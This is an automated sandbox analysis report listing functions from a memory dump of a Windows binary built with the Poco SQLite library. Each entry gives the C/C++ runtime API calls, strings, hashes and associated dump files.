String ID: /$/$D:\vcpkg\buildtrees\poco\src\a79b8b5d92-31a2ca8a23.clean\Data\SQLite\src\SQLiteStatementImpl.cpp$D:\vcpkg\buildtrees\poco\src\a79b8b5d92-31a2ca8a23.clean\Data\include\Poco/Data/StatementImpl.h$No data received$_curDataSet < _extractors.size()$columnsReturned() == sqlite3_column_count(_pStmt)$t value
API String ID: 3447690668-3286107200
Opcode ID: b87875c29cec1ea76c36ebe5bc3b083def50bf09d3257d9b842e02e25f985083
Instruction ID: eabfcd4b28ea98c4f8f9e0b1fab4348dbcf65038d461772fe7521c08f4c208f6
Opcode Fuzzy Hash: b87875c29cec1ea76c36ebe5bc3b083def50bf09d3257d9b842e02e25f985083
Instruction Fuzzy Hash: 9391F230A04219DFCB24DF68DD81BEDB7F5BF44710F148169E859AB292DB71AE848B90

Uniqueness

Uniqueness Score: -1.00%

Function 000F0413, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 180COMMON

Download Yara Rule

APIs

Replicator::operator[].LIBVCRUNTIME ref: 000F0450
DName::operator=.LIBVCRUNTIME ref: 000F04A2

Strings

generic-type-, xrefs: 000F04DB
@, xrefs: 000F05B8
template-parameter-, xrefs: 000F04B4

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator=Replicator::operator[]
String ID: @$generic-type-$template-parameter-
API String ID: 3211817929-1320211309
Opcode ID: c8b05a7d9449a01d436e04c26ca29680b68a3ad5cf93310de99cbfb95f8936cb
Instruction ID: f9258d049654be52ccfc4ae8c149a4c031eb8a22a4957c5059f8f01abd1907f9
Opcode Fuzzy Hash: c8b05a7d9449a01d436e04c26ca29680b68a3ad5cf93310de99cbfb95f8936cb
Instruction Fuzzy Hash: F161C1B1A0460D9FDB14DFA5D841AFEBBF8AF09300F14401AE602B7A93DB74A945DF90

Uniqueness

Uniqueness Score: -1.00%

Function 000FB957, Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 000FB96D

Part of subcall function 000FB6F7: HeapFree.KERNEL32(00000000,00000000,?,001025E6,?,00000000,?,?,?,00102889,?,00000007,?,?,00102E7F,?), ref: 000FB70D
Part of subcall function 000FB6F7: GetLastError.KERNEL32(?,?,001025E6,?,00000000,?,?,?,00102889,?,00000007,?,?,00102E7F,?,?), ref: 000FB71F

_free.LIBCMT ref: 000FB979
_free.LIBCMT ref: 000FB984
_free.LIBCMT ref: 000FB98F
_free.LIBCMT ref: 000FB99A
_free.LIBCMT ref: 000FB9A5
_free.LIBCMT ref: 000FB9B0
_free.LIBCMT ref: 000FB9BB
_free.LIBCMT ref: 000FB9C6
_free.LIBCMT ref: 000FB9D4

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7a2879c80361d7827f9eb313cf8932b68ed6f628af6e404d52ddb47d44d555f4
Instruction ID: 651d4e71c38802a321dbaa7a01e9d9dbbbe74c44876b4ee74242c6acb58bcc08
Opcode Fuzzy Hash: 7a2879c80361d7827f9eb313cf8932b68ed6f628af6e404d52ddb47d44d555f4
Instruction Fuzzy Hash: 6821987A90014CAFCB41EF99D891DFD7BB9AF08344B0141A5F615DB922EB36DA44DF80

Uniqueness

Uniqueness Score: -1.00%

Function 00021870, Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 258COMMON

Download Yara Rule

APIs

allocator.LIBCONCRTD ref: 00021AC2
allocator.LIBCONCRTD ref: 00021B58

Strings

handle, xrefs: 000219CC
,qh, xrefs: 0002189F, 000218A5
storage, xrefs: 0002194F
deque, xrefs: 00021922
bulk, xrefs: 00021A64, 00021A6B
,qh, xrefs: 00021891, 00021BC7

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: allocator
String ID: ,qh$,qh$bulk$deque$handle$storage
API String ID: 3447690668-2031525282
Opcode ID: 96f2ae5fa1577534abef9592f0a76e4aec9e3b783d58ac9e0689a9d58f261920
Instruction ID: e2fa59921926908a60155a89356d9734b3d88c8722167aaf70a78dbb591afee1
Opcode Fuzzy Hash: 96f2ae5fa1577534abef9592f0a76e4aec9e3b783d58ac9e0689a9d58f261920
Instruction Fuzzy Hash: ABA1F1709042489FDB05CFA8D9897EEBFF5AF59314F248148E444BB7C2D778AA84CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000364B0, Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 469COMMON

Download Yara Rule

APIs

allocator.LIBCONCRTD ref: 00036763
Concurrency::cancel_current_task.LIBCPMTD ref: 0003691E

Strings

,qh, xrefs: 000368DA, 000369E6
format argument index out of range, xrefs: 000368E8
,qh, xrefs: 00036963, 000364D0, 00036993
,qh, xrefs: 00036503, 0003686F

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::cancel_current_taskallocator
String ID: ,qh$,qh$,qh$format argument index out of range
API String ID: 2229103223-3484054603
Opcode ID: f17359ce3643976707459fb8a779d333b64d8ffca3ecefa0f6eb1596a8dc7645
Instruction ID: f8558b472a2264fa30212ce491cd17b00b4aaa6bfc9d1b44896e66951e2165cf
Opcode Fuzzy Hash: f17359ce3643976707459fb8a779d333b64d8ffca3ecefa0f6eb1596a8dc7645
Instruction Fuzzy Hash: 44028270D042489FCB15CFA8C895AEDBBF9FF49300F24866AE416EB396DB319945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 000F9131, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

APIs

Part of subcall function 000FBA6F: GetLastError.KERNEL32(?,?,?,000F1742,?,?,00000000,?,000F1119,?,?,?), ref: 000FBA74
Part of subcall function 000FBA6F: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00000000,?,000F1119,?,?,?), ref: 000FBB12

_free.LIBCMT ref: 000F941C
_free.LIBCMT ref: 000F9435
_free.LIBCMT ref: 000F9473
_free.LIBCMT ref: 000F947C
_free.LIBCMT ref: 000F9488

Strings

C, xrefs: 000F928D

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: cb3ec82342088a5873d74fbc10496df758d429871982f3c61e81c0d96dd0fdf1
Instruction ID: 3bde935cbb348c46cdeebedba499bb6a96e50719f4ba08d676fa748aab79a4b5
Opcode Fuzzy Hash: cb3ec82342088a5873d74fbc10496df758d429871982f3c61e81c0d96dd0fdf1
Instruction Fuzzy Hash: B1B1597590121A9FDB64DF18C888BBDB3B5FF48304F1045AAEA49A7791E731AE90DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00015A70, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 248COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 00015B68
std::locale::_Init.LIBCPMT ref: 00015D24

Strings

ios_base::failbit set, xrefs: 00015C23
ios_base::eofbit set, xrefs: 00015C28
,qh, xrefs: 00015C7F, 00015DA4, 00015A80
ios_base::badbit set, xrefs: 00015C19, 00015C42, 00015C75

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: Initstd::locale::_
String ID: ,qh$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1620887387-3198441750
Opcode ID: 85dbada6694e8505724f88ff7d3ec510b33ae415af76a0c1a9b5cdf66ba29058
Instruction ID: ff1b7dee2749ec67cdd3ad29681014c17e0d6962726ac56ddbbd8aaeecc30dc1
Opcode Fuzzy Hash: 85dbada6694e8505724f88ff7d3ec510b33ae415af76a0c1a9b5cdf66ba29058
Instruction Fuzzy Hash: 1EA157B1A00745DFEB11CF54C985B9ABBF4FF08304F108569E815AF792D7B6AA48CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0001B580, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 237COMMON

Download Yara Rule

APIs

allocator.LIBCONCRTD ref: 0001B773

Strings

://, xrefs: 0001B5C4
No backend name found in , xrefs: 0001B7F5
@,qh, xrefs: 0001B6BE, 0001B7A0
,qh, xrefs: 0001B5BE
,qh, xrefs: 0001B7DE

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: allocator
String ID: ,qh$,qh$://$@,qh$No backend name found in
API String ID: 3447690668-1342788004
Opcode ID: 0777cbe5114c88ee6ab53cf6c34c71e6d73c5518200e2c88e69a9720e856d80b
Instruction ID: 6ae750db8bac0c043bdc73ef036e6562438e0c2756d4a835e4e82743fe88291e
Opcode Fuzzy Hash: 0777cbe5114c88ee6ab53cf6c34c71e6d73c5518200e2c88e69a9720e856d80b
Instruction Fuzzy Hash: 5A81E7719042489FCF14DFB9C884BEEBBBAEF85310F14421DE425AB2C6D7759981CB61

Uniqueness

Uniqueness Score: -1.00%

Function 000EBDAC, Relevance: 10.7, APIs: 7, Instructions: 151COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 000EBE3A
DName::operator+.LIBCMT ref: 000EBE8D

Part of subcall function 000EAB09: shared_ptr.LIBCMT ref: 000EAB25

Part of subcall function 000EAA34: DName::operator+.LIBCMT ref: 000EAA55

DName::operator+.LIBCMT ref: 000EBE7E
DName::operator+.LIBCMT ref: 000EBEDE
DName::operator+.LIBCMT ref: 000EBEEB
DName::operator+.LIBCMT ref: 000EBF32
DName::operator+.LIBCMT ref: 000EBF3F

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$shared_ptr
String ID:
API String ID: 1037112749-0
Opcode ID: a0e514307506d1c0249b58cacd6f648797d48e1ed2ddf3d08766054ceea0c2ed
Instruction ID: 4bc1e88bd9c6f74529a9d9c6f8ad28a9cf30d74fb18146aa83c1d25db431cb31
Opcode Fuzzy Hash: a0e514307506d1c0249b58cacd6f648797d48e1ed2ddf3d08766054ceea0c2ed
Instruction Fuzzy Hash: 66517571A04258AFDF15DB95D856EEFBBF8AF0C300F044159F602B7281DB70A644CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 000E85B0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 000E85E7
___except_validate_context_record.LIBVCRUNTIME ref: 000E85EF
_ValidateLocalCookies.LIBCMT ref: 000E8678
__IsNonwritableInCurrentImage.LIBCMT ref: 000E86A3
_ValidateLocalCookies.LIBCMT ref: 000E86F8

Strings

csm, xrefs: 000E868D

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 93639866a2708f1bab0e6e79f13902b71680e408adb0cf8ab4754b3479f711a8
Instruction ID: 00713e8ffadbc846ba7b918d50a8675da4709a79c8b691126cbbbde0c8030c3b
Opcode Fuzzy Hash: 93639866a2708f1bab0e6e79f13902b71680e408adb0cf8ab4754b3479f711a8
Instruction Fuzzy Hash: 2941C134A00249AFCF10DF69C885AAEBBF1AF45324F14C055E819AB393DB31DA55CB91

Uniqueness

Uniqueness Score: -1.00%

Function 000ECFF6, Relevance: 10.6, APIs: 7, Instructions: 102COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 000ED01E
DName::DName.LIBVCRUNTIME ref: 000ED04B

Part of subcall function 000EA879: __aulldvrm.LIBCMT ref: 000EA8AA

DName::operator+.LIBCMT ref: 000ED066
DName::DName.LIBVCRUNTIME ref: 000ED083
DName::DName.LIBVCRUNTIME ref: 000ED0B3
DName::DName.LIBVCRUNTIME ref: 000ED0BD
DName::DName.LIBVCRUNTIME ref: 000ED0E4

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: NameName::$Name::operator+__aulldvrm
String ID:
API String ID: 4069495278-0
Opcode ID: 1efb7144a12aace49292dba173a64dd75683b4d35286e49c5866383fbb66e282
Instruction ID: 3581b743149d22c78062e092ab799e3cdb756624c822f88ae6f3226b7a672a4d
Opcode Fuzzy Hash: 1efb7144a12aace49292dba173a64dd75683b4d35286e49c5866383fbb66e282
Instruction Fuzzy Hash: AF31E271A08184AFCF18DBA6D851BED7BB5FF4A310F18414AE443B7A93DB30A946DB11

Uniqueness

Uniqueness Score: -1.00%

Function 0001B9D0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,6871E12C,?,?), ref: 0001BA11
LeaveCriticalSection.KERNEL32(-0000000C), ref: 0001BA2D
ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 0001BA3C
LeaveCriticalSection.KERNEL32(00000000,?,00199F5C,?,6871E12C,?,?), ref: 0001BA91

Strings

Invalid pool position, xrefs: 0001BA5F
Cannot release pool entry (already free), xrefs: 0001BA97

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$EnterReleaseSemaphore
String ID: Cannot release pool entry (already free)$Invalid pool position
API String ID: 2813224205-865976125
Opcode ID: fc83d20bab5f9579f6cd8cfa268a839f26d63aef36549106fe2a97f1141d23a2
Instruction ID: 7c48a4ad337f1a2dd244871cec095fd333e890a42d0aabf52e74a5a5fd40c4a2
Opcode Fuzzy Hash: fc83d20bab5f9579f6cd8cfa268a839f26d63aef36549106fe2a97f1141d23a2
Instruction Fuzzy Hash: 97314A76900208EFCB11DFA4CC85FDEBBB8FB08710F50456AF506AB692DB75AA45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 000ED629, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 000ED64D
DName::DName.LIBVCRUNTIME ref: 000ED671

Strings

%lf, xrefs: 000ED6B2
A, xrefs: 000ED6D9

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: NameName::
String ID: %lf$A
API String ID: 1333004437-43661536
Opcode ID: 8c81af34ce998ca006e32538f854a9f55fa0c358da0c4b1b241021639e3ca437
Instruction ID: 70f87c0a9d66c9a207bc885a792f1e393bf8c25ed88761d19a5b431074b7454c
Opcode Fuzzy Hash: 8c81af34ce998ca006e32538f854a9f55fa0c358da0c4b1b241021639e3ca437
Instruction Fuzzy Hash: EA316FB0A086989FCF24DFA5D8456EDBBB4FF49300F00405FE486BB682DB749945DB45

Uniqueness

Uniqueness Score: -1.00%

Function 000FBE97, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

ext-ms-, xrefs: 000FBF02
api-ms-, xrefs: 000FBEEE

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 724f35c3f9ae588ba588046f4da70453d383f81d75862e8d4448cec7f65c93ea
Instruction ID: 3d9bc26d5462923475178fecc9abfa56b2bc727b07073f8d57ba017cf896ac21
Opcode Fuzzy Hash: 724f35c3f9ae588ba588046f4da70453d383f81d75862e8d4448cec7f65c93ea
Instruction Fuzzy Hash: 30219671A05619EBCB728B64DC85B7E37989F05760F250570FA06EBA91D730DE04AEE0

Uniqueness

Uniqueness Score: -1.00%

Function 00102870, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 001025BC: _free.LIBCMT ref: 001025E1

_free.LIBCMT ref: 001028BE

Part of subcall function 000FB6F7: HeapFree.KERNEL32(00000000,00000000,?,001025E6,?,00000000,?,?,?,00102889,?,00000007,?,?,00102E7F,?), ref: 000FB70D
Part of subcall function 000FB6F7: GetLastError.KERNEL32(?,?,001025E6,?,00000000,?,?,?,00102889,?,00000007,?,?,00102E7F,?,?), ref: 000FB71F

_free.LIBCMT ref: 001028C9
_free.LIBCMT ref: 001028D4
_free.LIBCMT ref: 00102928
_free.LIBCMT ref: 00102933
_free.LIBCMT ref: 0010293E
_free.LIBCMT ref: 00102949

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 513c29f468e6673701023cdd349a857561d4af8b0d7e11b893dd47f8227b934b
Instruction ID: 7be41a7eedeb25bd0ca5340cc69dd632ee5a76f5ccce4747b2be653aa702e216
Opcode Fuzzy Hash: 513c29f468e6673701023cdd349a857561d4af8b0d7e11b893dd47f8227b934b
Instruction Fuzzy Hash: 6F114F71540B08AAD521B7B1DC0BFEB779C5F00701F40081AF2D9A6093EBF9B5049E98

Uniqueness

Uniqueness Score: -1.00%

Function 000F3DEF, Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(00000000,00000000,00000000), ref: 000F3E37
__fassign.LIBCMT ref: 000F401C
__fassign.LIBCMT ref: 000F4039
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000F4081
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 000F40C1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 000F4169

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: b092907dfb5c5f7456c88e8c382196bffbd44c2cbb70057f22cf2df538a8ef32
Instruction ID: a7729c53795785887db02c872dda8609e945cf4511191d2779670416d035e682
Opcode Fuzzy Hash: b092907dfb5c5f7456c88e8c382196bffbd44c2cbb70057f22cf2df538a8ef32
Instruction Fuzzy Hash: 8DC1BF71D0029C9FCB11CFA8C8809EEBBB5BF19314F28416AEA55F7642D7319E46DB60

Uniqueness

Uniqueness Score: -1.00%

Function 000F67BD, Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 000F6945
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000F6961
__allrem.LIBCMT ref: 000F6978
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000F6996
__allrem.LIBCMT ref: 000F69AD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000F69CB

Memory Dump Source

Source File: 0000001D.00000002.460380741.0000000000011000.00000080.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 0000001D.00000002.460325527.0000000000010000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461627389.0000000000150000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.461770000.0000000000164000.00000002.00020000.sdmp Download File
Associated: 0000001D.00000002.462153102.00000000001A2000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462207730.00000000001A5000.00000008.00020000.sdmp Download File
Associated: 0000001D.00000002.462257928.00000000001AC000.00000004.00020000.sdmp Download File
Associated: 0000001D.00000002.462286659.00000000001AF000.00000002.00020000.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: d0c9164f44a357e9dc73a48d243bc5d2f6adf6036e2829cdce508d33bc7f2865
Instruction ID: d0d4798c852d33b166c79949ea4bc2bea2200637a11be5c19635ea2089a2614d
Opcode Fuzzy Hash: d0c9164f44a357e9dc73a48d243bc5d2f6adf6036e2829cdce508d33bc7f2865
Instruction Fuzzy Hash: 4081397160071A9FD720AF28CC42BBA73E9EF44764F14862DF650D7B82EB72D9019B51

Uniqueness

Uniqueness Score: -1.00%

Function 000F781B, Relevance: 9.2, APIs: 6, Instructions: 221COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 000F78AB
_free.LIBCMT ref: 000F78C6
_free.LIBCMT ref: 000F78D1
_free.LIBCMT ref: 000F79DE

Part of subcall function 000FB69A: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,000FBC11,00000001,00000364,00000005,000000FF,?,00101C73,?,00000004,00000000,?,?), ref: 000FB6DB

_free.LIBCMT ref: 000F79B3

